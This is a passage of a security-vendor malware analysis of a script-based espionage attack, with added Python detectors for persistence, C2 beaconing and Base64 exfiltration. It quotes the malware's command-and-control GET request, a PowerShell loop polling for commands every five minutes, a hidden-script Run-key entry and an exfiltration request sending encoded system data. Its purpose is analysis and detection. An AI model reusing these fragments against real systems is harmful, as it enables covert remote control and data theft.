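SCRIPT_EXT = re.compile(r"\.(vbs|vbe|ps1|js|jse|wsf|hta|bat|cmd)\b", re.IGNORECASE)
PUBLIC_DOCS = re.compile(r"c:\\users\\public\\documents\\", re.IGNORECASE)

# --- constructed snapshots -------------------------------------------------
REGISTRY: Dict[str, int] = {
    r"HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings": 1,
    r"HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings": 1,
    r"HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings": 2,
}
RUN_VALUES: Dict[str, str] = {   # value name "NTSTATS" is an assumption
    "NTSTATS": r'wscript.exe //B "C:\Users\public\documents\NTSTATS.vbs"',
    "OneDrive": r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}
TASKS: List[Tuple[str, str]] = [   # (task name, action); first name is an assumption
    ("NTSTATS", r'wscript.exe //B "C:\Users\public\documents\NTSTATS.vbs"'),
    ("Adobe Acrobat Update Task", r'"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"'),
]
FILES: List[Tuple[str, Set[str]]] = [   # (path, attribute set), as a directory listing would give them
    (r"C:\Users\public\documents\NTSTATS.ps1", {"hidden", "system", "archive"}),
    (r"C:\Users\public\documents\NTSTATS.vbs", {"hidden", "system", "archive"}),
    (r"C:\Users\public\documents\budget.xlsx", {"archive"}),
    (r"C:\Users\public\documents\desktop.ini", {"hidden", "system"}),
]


def macro_policy_findings(registry: Dict[str, int]) -> List[str]:
    """Registry paths whose VBAWarnings value is Enable All (1)."""
    return sorted(key for key, value in registry.items()
                  if key.lower().endswith(r"\security\vbawarnings") and value == VBA_WARNINGS_ENABLE_ALL)


def persistence_findings(run_values: Dict[str, str], tasks: Iterable[Tuple[str, str]]) -> List[str]:
    """Run-key values and scheduled-task actions that launch a script from Public Documents."""
    out: List[str] = []
    for name, cmd in run_values.items():
        if SCRIPT_EXT.search(cmd) and PUBLIC_DOCS.search(cmd):
            out.append(f"run-key {name}: {cmd}")
    for task, action in tasks:
        if SCRIPT_EXT.search(action) and PUBLIC_DOCS.search(action):
            out.append(f"task {task}: {action}")
    return out


def hidden_script_findings(files: Iterable[Tuple[str, Set[str]]]) -> List[str]:
    """Script files carrying both the hidden and system attributes (the effect of attrib +s +h)."""
    return [path for path, attrs in files
            if SCRIPT_EXT.search(path) and {"hidden", "system"} <= attrs]


def triage(registry: Dict[str, int], run_values: Dict[str, str],
           tasks: Iterable[Tuple[str, str]], files: Iterable[Tuple[str, Set[str]]]) -> Dict[str, List[str]]:
    """Bundle the three checks so one call covers the whole chain the post describes."""
    return {
        "macro_policy": macro_policy_findings(registry),
        "persistence": persistence_findings(run_values, tasks),
        "hidden_scripts": hidden_script_findings(files),
    }


if __name__ == "__main__":
    for section, items in triage(REGISTRY, RUN_VALUES, TASKS, FILES).items():
        print(section)
        for item in items:
            print("  ", item)
```

On a live host the same three inputs come from the registry hives, the Task Scheduler library and a directory listing that includes hidden and system files; the point of the example is that a persistence mechanism is interesting mostly because of where it points (a script in a world-writable folder), not because a Run key or task exists at all.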

Espionage and exfiltration

That PowerShell script contains the same instructions to lower Office’s security settings but, more importantly, is used to exfiltrate data and communicate with the command and control server.

A unique ID is stored on the victim’s machine (in the same folder as the scripts) in a file called [username].key and is used to receive instructions via a server located in Germany (although it appears to be down at the time of writing).

GET http://144.76.109[.]88/al/?action=getCommand&id=[user ID] HTTP/1.1

A function called getKey retrieves the unique ID from the .key file stored on the local hard drive to register the machine as a new victim. If the key file does not exist, it queries for additional system information (computer name, IP address, OS version) and then creates that key (Set-Content $keypath $id).

Another function called getCommand uses the key as a parameter to then contact the C2. This command runs every 5 minutes:

while ($true){
 getCommand $key
 start-sleep -Seconds 300
}

The malicious script can receive and run any command the attackers want via PowerShell, making this a very powerful attack.
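A fixed 300-second sleep between polls is exactly what periodicity analysis on proxy or firewall logs catches. The script below is an added example, not code from the original post: the proxy log lines are constructed, while the URL pattern (/al/?action=getCommand&id=...), the 5-minute interval and the (defanged) server IP come from the post. It groups requests per client and URL while ignoring the per-victim id parameter, then flags series whose inter-request gaps are almost constant.

```python
"""Spotting a fixed-interval C2 poll in proxy logs.

Added example, not from the original post. The log lines are constructed; the
URL pattern, the 300-second cadence and the server IP are from the post.
"""
import statistics
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterator, List, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log: "<ISO-8601 UTC timestamp> <client ip> <method> <url>"
PROXY_LOG = """\
2017-09-20T10:00:00Z 10.1.2.3 GET http://144.76.109[.]88/al/?action=getCommand&id=WS01-a1b2c3
2017-09-20T10:00:07Z 10.1.2.4 GET http://www.example.com/news/
2017-09-20T10:05:01Z 10.1.2.3 GET http://144.76.109[.]88/al/?action=getCommand&id=WS01-a1b2c3
2017-09-20T10:08:40Z 10.1.2.4 GET http://www.example.com/news/page/2
2017-09-20T10:10:00Z 10.1.2.3 GET http://144.76.109[.]88/al/?action=getCommand&id=WS01-a1b2c3
2017-09-20T10:15:02Z 10.1.2.3 GET http://144.76.109[.]88/al/?action=getCommand&id=WS01-a1b2c3
2017-09-20T10:15:09Z 10.1.2.4 GET http://www.example.com/news/
2017-09-20T10:20:00Z 10.1.2.3 GET http://144.76.109[.]88/al/?action=getCommand&id=WS01-a1b2c3
2017-09-20T10:31:55Z 10.1.2.4 GET http://www.example.com/news/page/3
"""


def refang(url: str) -> str:
    """Turn a defanged indicator back into a parseable URL."""
    return url.replace("[.]", ".")


def parse_log(text: str) -> Iterator[Tuple[datetime, str, str, str]]:
    """Yield (timestamp, client, method, url) for each non-empty log line."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, method, url = line.split(maxsplit=3)
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), client, method, refang(url)


def find_beacons(text: str, min_hits: int = 4, max_jitter: float = 0.1) -> List[Dict[str, object]]:
    """Group requests by (client, host, path, action), dropping the per-victim id,
    and flag groups whose gaps all lie within max_jitter of the median gap."""
    series: Dict[Tuple[str, str, str, str], List[datetime]] = defaultdict(list)
    for ts, client, _, url in parse_log(text):
        u = urlsplit(url)
        action = parse_qs(u.query).get("action", [""])[0]
        series[(client, u.netloc, u.path, action)].append(ts)

    hits: List[Dict[str, object]] = []
    for (client, host, path, action), stamps in series.items():
        if len(stamps) < min_hits:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        median = statistics.median(gaps)
        if median > 0 and max(abs(g - median) for g in gaps) / median <= max_jitter:
            hits.append({"client": client, "host": host, "path": path, "action": action,
                         "count": len(stamps), "median_interval": median})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(PROXY_LOG):
        print(hit)
```

A 10 % jitter bound is generous for this sample because the script sleeps a fixed 300 seconds and adds only the request time; legitimate pollers (webmail refresh, update checks) also beacon regularly, so in practice the cadence finding is combined with the destination’s reputation, the oddity of the path and the fact that the responses carry commands.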

The eventual exfiltration of data is done via several hardcoded websites acting as a proxy via the sendResult function:

The transmission of data is done via Base64 encoded strings, one for the user id (.key file) and one for the exfiltrated data.

GET /wp-content/wp_fast_cache/wmg-global.com/Senditem.php?c=[removed]== HTTP/1.1
Host: www.wmg-global.com
Connection: Keep-Alive

The parameters passed on the URL in the Base64 format:


Decoding the value in the variable “res”, we get the following info:

Connection-specific DNS Suffix . : [removed]
Description . . . . . . . . . . . : [removed]
Physical Address. . . . . . . . . : [removed]
DHCP Enabled. . . . . . . . . . . : [removed]
Autoconfiguration Enabled . . . . : [removed]
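Exfiltration as a Base64 string in a GET query is easy to decode and, with a couple of heuristics, easy to flag. The code below is an added example, not from the original post: the request line reuses the Senditem.php path and the parameter name c shown above, but the encoded value is constructed from a redacted ipconfig-style text, since the real one is removed from the post. It decodes every query parameter that looks like Base64 and reports those that yield long printable text.

```python
"""Decoding and flagging Base64 exfiltration carried in a GET query string.

Added example, not from the original post. The request path and the parameter
name are from the post; the encoded payload is constructed.
"""
import base64
import binascii
import string
from typing import List, Optional, Tuple
from urllib.parse import quote, unquote, urlsplit

PRINTABLE = set(string.printable)

# Constructed stand-in for the exfiltrated data (the post shows this output with values removed).
CONSTRUCTED_RES = (
    "Connection-specific DNS Suffix . : corp.example\n"
    "Description . . . . . . . . . . . : Intel(R) Ethernet Connection\n"
    "Physical Address. . . . . . . . . : 00-11-22-33-44-55\n"
    "DHCP Enabled. . . . . . . . . . . : Yes\n"
    "Autoconfiguration Enabled . . . . : Yes\n"
)
SAMPLE_B64 = base64.b64encode(CONSTRUCTED_RES.encode()).decode()
SAMPLE_REQUEST = (
    "GET /wp-content/wp_fast_cache/wmg-global.com/Senditem.php?c="
    + quote(SAMPLE_B64, safe="") + " HTTP/1.1"
)


def try_b64(value: str, min_printable: float = 0.95) -> Optional[str]:
    """Decode standard or URL-safe Base64 (fixing missing padding) and return the
    text if it is overwhelmingly printable; None if it is not Base64 text."""
    v = value.strip().replace("-", "+").replace("_", "/")
    v += "=" * (-len(v) % 4)
    try:
        raw = base64.b64decode(v, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if not text or sum(ch in PRINTABLE for ch in text) / len(text) < min_printable:
        return None
    return text


def inspect_request(request_line: str, min_len: int = 64) -> List[Tuple[str, str]]:
    """Return (parameter, decoded text) for every query value that is at least
    min_len characters and decodes to printable text. The query is split by hand
    because parse_qsl would turn '+' (a Base64 character) into a space."""
    _method, target, _version = request_line.split(" ", 2)
    query = urlsplit(target).query
    findings: List[Tuple[str, str]] = []
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, raw_value = pair.partition("=")
        value = unquote(raw_value)
        if len(value) < min_len:
            continue
        text = try_b64(value)
        if text is not None:
            findings.append((unquote(key), text))
    return findings


if __name__ == "__main__":
    for param, text in inspect_request(SAMPLE_REQUEST):
        print(f"parameter {param!r} decodes to:\n{text}")
```

Plenty of legitimate sites also pass Base64 in query strings (session tokens, signed URLs), so length and printable-text ratio are only the first filter; the decoded content reading like command output, the destination being a compromised WordPress path and the request being a GET with no referrer are what turn this into an exfiltration alert.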

Script based attack and protection

This attack is very different from the typical malicious spam we see on a daily basis, blasting Locky or some banking Trojan. Indeed, there is no malicious binary payload (although one could be downloaded by the C2) which makes us think the attackers are trying to keep a low profile and remain on the system while collecting information from their target.

Relying on scripts as part of the attack chain and ongoing infection is an interesting concept because of how modular it is, not to mention more likely to remain undetected by antivirus engines. At the same time, it has to rely on various encoding techniques because it can’t make use of a packer the way a traditional malware binary would.

Malwarebytes users are already protected against this attack thanks to our signature-less engine.

Indicators of compromise







The post Elaborate scripting-fu used in espionage attack against Saudi Arabia Government entity appeared first on Malwarebytes Labs.

